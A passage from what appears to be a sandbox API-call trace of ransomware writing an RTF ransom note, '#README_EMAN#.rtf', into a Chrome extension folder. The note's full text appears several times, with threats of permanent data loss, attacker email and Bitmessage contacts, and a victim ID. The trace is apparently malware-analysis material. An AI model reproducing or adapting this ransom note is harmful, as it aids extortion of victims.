\\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.349] WriteFile (in: hFile=0x2e8, lpBuffer=0x24647a8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24647a8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.349] CloseHandle (hObject=0x2e8) returned 1 [0289.349] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\#readme_eman#.rtf")) returned 0xffffffff [0289.349] GetLastError () returned 0x2 [0289.349] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0289.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.350] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR 